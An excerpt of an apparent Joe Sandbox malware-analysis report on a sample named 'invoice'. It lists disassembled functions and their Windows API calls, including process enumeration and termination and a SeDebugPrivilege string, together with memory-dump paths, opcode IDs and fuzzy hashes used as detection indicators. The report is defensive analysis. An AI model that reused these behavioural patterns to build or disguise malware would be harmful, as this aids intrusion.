                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                        • String ID:
                        • API String ID: 2014098862-0
                        • Opcode ID: 0002fc835e0ce0ef0cbb3d0c088d65907ba3c08d6cf2f77b161cb68693eddb3b
                        • Instruction ID: aa3a5abe789eac01397c53ade94904c73c3ac675d1a6aa216440cf36714aabed
                        • Opcode Fuzzy Hash: 0002fc835e0ce0ef0cbb3d0c088d65907ba3c08d6cf2f77b161cb68693eddb3b
                        • Instruction Fuzzy Hash: 2D11E171650618BFF6216B70CC89FAA7B2DEB4C765F10041AF284AB194CAF75C10EBA4
                        Function 00FD8BE3 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FD8864,00000B00,?,?), ref: 00FD8BEC
                        • HeapAlloc.KERNEL32(00000000,?,00FD8864,00000B00,?,?), ref: 00FD8BF3
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FD8864,00000B00,?,?), ref: 00FD8C08
                        • GetCurrentProcess.KERNEL32(?,00000000,?,00FD8864,00000B00,?,?), ref: 00FD8C10
                        • DuplicateHandle.KERNEL32(00000000,?,00FD8864,00000B00,?,?), ref: 00FD8C13
                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FD8864,00000B00,?,?), ref: 00FD8C23
                        • GetCurrentProcess.KERNEL32(00FD8864,00000000,?,00FD8864,00000B00,?,?), ref: 00FD8C2B
                        • DuplicateHandle.KERNEL32(00000000,?,00FD8864,00000B00,?,?), ref: 00FD8C2E
                        • CreateThread.KERNEL32(00000000,00000000,00FD8C54,00000000,00000000,00000000), ref: 00FD8C48
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        • Opcode ID: 804eb3b4c1f0e5a5453be94edbfa24211727fde38faedc841e77e5b1c9c880c9
                        • Instruction ID: 19a32a01725e9b6511d4c79662988815272fbab1781189ad87b74c4a7fd8a9ff
                        • Opcode Fuzzy Hash: 804eb3b4c1f0e5a5453be94edbfa24211727fde38faedc841e77e5b1c9c880c9
                        • Instruction Fuzzy Hash: 3C01B6B5240349BFEB31EBA5DC4DFAB3BACEB89711F004411FA45DB295CA759800DB20
                        Function 00FF9228 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$_memset
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 2862541840-625585964
                        • Opcode ID: ab5d376ea2cfa7c156d4a13eb38911f6eab246e2953e919a54066af1c14c9a70
                        • Instruction ID: fcbc5558c6082394f738b32552ede71167653402c29f8e0e24033d74c421b4fd
                        • Opcode Fuzzy Hash: ab5d376ea2cfa7c156d4a13eb38911f6eab246e2953e919a54066af1c14c9a70
                        • Instruction Fuzzy Hash: E291BF71E04219ABDF24DFA5C884FAEB7B8EF45720F10855AF605AB290D7B49901DFA0
                        Function 00FF9872 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FD7432: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?,?,00FD777D), ref: 00FD744F
                          • Part of subcall function 00FD7432: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD746A
                          • Part of subcall function 00FD7432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD7478
                          • Part of subcall function 00FD7432: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?), ref: 00FD7488
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00FF991B
                        • _memset.LIBCMT ref: 00FF9928
                        • _memset.LIBCMT ref: 00FF9A6B
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00FF9A97
                        • CoTaskMemFree.OLE32(?), ref: 00FF9AA2
                        Strings
                        • NULL Pointer assignment, xrefs: 00FF9AF0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 1300414916-2785691316
                        • Opcode ID: 18b1e5b809b83fe26a8b5497675307fea2e82f5685feae344d7adf537a6ff051
                        • Instruction ID: d7f4d3745809af3bf6096f6cf287ed81cbc2446aa139a41015ce20c02d19d992
                        • Opcode Fuzzy Hash: 18b1e5b809b83fe26a8b5497675307fea2e82f5685feae344d7adf537a6ff051
                        • Instruction Fuzzy Hash: 72916B71D0021DABDB10EFA4DC80AEEBBB8EF08710F20415AF505A7291DB759A40DFA0
                        Function 01006DB2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01006E56
                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 01006E6A
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01006E84
                        • _wcscat.LIBCMT ref: 01006EDF
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 01006EF6
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01006F24
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcscat
                        • String ID: SysListView32
                        • API String ID: 307300125-78025650
                        • Opcode ID: d97f3de54040ed021b4c29da1d86d5f7c6fecce357bf51ff544feee66cef872e
                        • Instruction ID: fb5219b1133840fc5bc5e6e0e99fd4b913b9b460daef65c7dc1e8f4bb0dc9bbf
                        • Opcode Fuzzy Hash: d97f3de54040ed021b4c29da1d86d5f7c6fecce357bf51ff544feee66cef872e
                        • Instruction Fuzzy Hash: 7241B170A00348AFEB22DF68CC85BEE77F9EF08350F00046AF585E71D2D67699948B60
                        Function 00FFEA47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FE3C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00FE3CBE
                          • Part of subcall function 00FE3C99: Process32FirstW.KERNEL32(00000000,?), ref: 00FE3CCC
                          • Part of subcall function 00FE3C99: CloseHandle.KERNEL32(00000000), ref: 00FE3D96
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FFEAB8
                        • GetLastError.KERNEL32 ref: 00FFEACB
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FFEAFA
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FFEB77
                        • GetLastError.KERNEL32(00000000), ref: 00FFEB82
                        • CloseHandle.KERNEL32(00000000), ref: 00FFEBB7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
                        • API String ID: 2533919879-2896544425
                        • Opcode ID: ce998819958b1108edd0cbdcaf60e53fb2c40f487221df523f055cc4b0c67c1d
                        • Instruction ID: f023bd8e855941d6a986013db94141480a804745182f0d2aae9cb7abc93376ef
                        • Opcode Fuzzy Hash: ce998819958b1108edd0cbdcaf60e53fb2c40f487221df523f055cc4b0c67c1d
                        • Instruction Fuzzy Hash: 2E41B0316042019FDB25EF54CC95F7DB7A6AF80714F088059FA429B3E2DBB9E804EB85
                        Function 00FE302E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 00FE30CD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        • Opcode ID: 81b1d2f6e587ffb5e6f72f1827ef6a875657ee09732624df6ece56252b1f2d09
                        • Instruction ID: 7770dd92291d529840e4189938f4aabb081a0f85d47043ebd7d31cd49db4649e
                        • Opcode Fuzzy Hash: 81b1d2f6e587ffb5e6f72f1827ef6a875657ee09732624df6ece56252b1f2d09
                        • Instruction Fuzzy Hash: 32110D3660C787BAD7315A56DC4ED6A77ACDF05338F10806EF70097181DBB56F4066A1
                        Function 00FE4339 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FE4353
                        • LoadStringW.USER32(00000000), ref: 00FE435A
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FE4370
                        • LoadStringW.USER32(00000000), ref: 00FE4377
                        • _wprintf.LIBCMT ref: 00FE439D
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FE43BB
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 00FE4398
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wprintf
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 3648134473-3128320259
                        • Opcode ID: 932bfa39be9aa6476557e005d3ebbb90a505f39f94ebcefd3472364abc64e712
                        • Instruction ID: df45eda941532d18b409b3c8753578a65929f6378abb414bfd9a6af650107661
                        • Opcode Fuzzy Hash: 932bfa39be9aa6476557e005d3ebbb90a505f39f94ebcefd3472364abc64e712
                        • Instruction Fuzzy Hash: FC0162F2900209BFE732DBA0DD89EE7776CE708301F000595B785E2041EA799E856B71
                        Function 0100D4A8 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • GetSystemMetrics.USER32(0000000F), ref: 0100D4E6
                        • GetSystemMetrics.USER32(0000000F), ref: 0100D506
                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0100D741
                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0100D75F
                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0100D780
                        • ShowWindow.USER32(00000003,00000000), ref: 0100D79F
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0100D7C4
                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0100D7E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                        • String ID:
                        • API String ID: 1211466189-0
                        • Opcode ID: 736f1bcfc4efffc9c22f7d20110863f3dfd69a5efe3181a2bee7b502d4e6f365
                        • Instruction ID: 98dd306c3c440ce37dbf426b900ecbf76852b80bcb6d888ca1bb6dddb71c3776
                        • Opcode Fuzzy Hash: 736f1bcfc4efffc9c22f7d20110863f3dfd69a5efe3181a2bee7b502d4e6f365
                        • Instruction Fuzzy Hash: 0AB19C75500215EFEF26CFACC9C47AD7BF1BF48701F0480A9ED889A299E735A950CB60
                        Function 00F82A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FBC347,00000004,00000000,00000000,00000000), ref: 00F82ACF
                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FBC347,00000004,00000000,00000000,00000000,000000FF), ref: 00F82B17
                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FBC347,00000004,00000000,00000000,00000000), ref: 00FBC39A
                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FBC347,00000004,00000000,00000000,00000000), ref: 00FBC406
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        • Opcode ID: 95d767d907133a1ec9c59c3cc7bf02a004f89ca04cdfb310db41c0347a7226ab
                        • Instruction ID: da3a5f33c5b7477d281f74384cc9025b87ee2b6db353eb0fdf6738ad73c34215
                        • Opcode Fuzzy Hash: 95d767d907133a1ec9c59c3cc7bf02a004f89ca04cdfb310db41c0347a7226ab
                        • Instruction Fuzzy Hash: C0412875A04680ABD7BEBB29CC887EB7BD1BF85320F58880DE08786550C67DB841F711
                        Function 00FE716F Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FE7186
                          • Part of subcall function 00FA0F36: std::exception::exception.LIBCMT ref: 00FA0F6C
                          • Part of subcall function 00FA0F36: __CxxThrowException@8.LIBCMT ref: 00FA0F81
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FE71BD
                        • EnterCriticalSection.KERNEL32(?), ref: 00FE71D9
                        • _memmove.LIBCMT ref: 00FE7227
                        • _memmove.LIBCMT ref: 00FE7244
                        • LeaveCriticalSection.KERNEL32(?), ref: 00FE7253
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FE7268
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FE7287
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                        • String ID:
                        • API String ID: 256516436-0
                        • Opcode ID: c446746ffd6d74a45e483b8570d372cc4c9b0d2fbc8f129d4479b8274bf46ef1
                        • Instruction ID: 0128dfd8c7a5f471ee7fdc74318a2e1c274d7642ff12d66c6a4193a3b827e8c2
                        • Opcode Fuzzy Hash: c446746ffd6d74a45e483b8570d372cc4c9b0d2fbc8f129d4479b8274bf46ef1
                        • Instruction Fuzzy Hash: EF31B071904206EFCF20EF65DC85AAE7778EF45310F1481A5F904EB24ADB759E10EBA1
                        Function 01006205 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 0100621D
                        • GetDC.USER32(00000000), ref: 01006225
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01006230
                        • ReleaseDC.USER32(00000000,00000000), ref: 0100623C
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01006278
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01006289
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0100905C,?,?,000000FF,00000000,?,000000FF,?), ref: 010062C3
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010062E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: a078251b87c0dc320f76f71473f327607959117e62e10c3e41f1ff7a8b47da66
                        • Instruction ID: a972cf2d64c44b3b856109cb1d7115f2e7bb874ae2608ff1606b47881b30d9ea
                        • Opcode Fuzzy Hash: a078251b87c0dc320f76f71473f327607959117e62e10c3e41f1ff7a8b47da66
                        • Instruction Fuzzy Hash: 7131A072200611BFEB228F64DC49FEB3FA9EF09761F040065FE48DA185C67A9851CBB4
                        Function 00FEEBAF Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                          • Part of subcall function 00F9FE06: _wcscpy.LIBCMT ref: 00F9FE29
                        • _wcstok.LIBCMT ref: 00FEED20
                        • _wcscpy.LIBCMT ref: 00FEEDAF
                        • _memset.LIBCMT ref: 00FEEDE2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                        • String ID: X
                        • API String ID: 774024439-3081909835
                        • Opcode ID: 9be6e6128423944778dd71b383c58dc030afaf06e94f2d5e5212afc0c4e73b0f
                        • Instruction ID: bfbedcf551f9414939990bfc23001a613b8c3f45aad11ac18527f937ab39b486
                        • Opcode Fuzzy Hash: 9be6e6128423944778dd71b383c58dc030afaf06e94f2d5e5212afc0c4e73b0f
                        • Instruction Fuzzy Hash: BDC18F716083419FC724FF24DC85A9AB7E4BF85310F14492DF8999B2A1DB74ED05EB82
                        Function 00F81424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd0364ccb0745275726afc29741ef3b7cf08fd281e3c35747386f0b30fbf640d
                        • Instruction ID: 3b5015f0f769d5a8166e0f3ab0cfcb0f0f3b8bbb86acd4f3a1852c062a9b7885
                        • Opcode Fuzzy Hash: fd0364ccb0745275726afc29741ef3b7cf08fd281e3c35747386f0b30fbf640d
                        • Instruction Fuzzy Hash: 59717031900109EFDB15DF99CC45AFEBB79FF86320F248249F915AA251C734AA52EF60
                        Function 00FF6C8C Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3046bf448ef52738091d6b377e5111af8c37b741e2f3e376aec69790298d04fd
                        • Instruction ID: cb0c83f6271fecd56f35fdcf86fef7a50f13839dd693e0f76ab34199182b25ae
                        • Opcode Fuzzy Hash: 3046bf448ef52738091d6b377e5111af8c37b741e2f3e376aec69790298d04fd
                        • Instruction Fuzzy Hash: 5B61CE76508304ABC720EB24CC86FAFB7E9AF84B10F044919F655972A2DF79DD01E752
                        Function 0100B385 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                        Download Yara Rule
                        APIs
                        • IsWindow.USER32(01505478), ref: 0100B41F
                        • IsWindowEnabled.USER32(01505478), ref: 0100B42B
                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0100B50F
                        • SendMessageW.USER32(01505478,000000B0,?,?), ref: 0100B546
                        • IsDlgButtonChecked.USER32(?,?), ref: 0100B583
                        • GetWindowLongW.USER32(01505478,000000EC), ref: 0100B5A5
                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0100B5BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
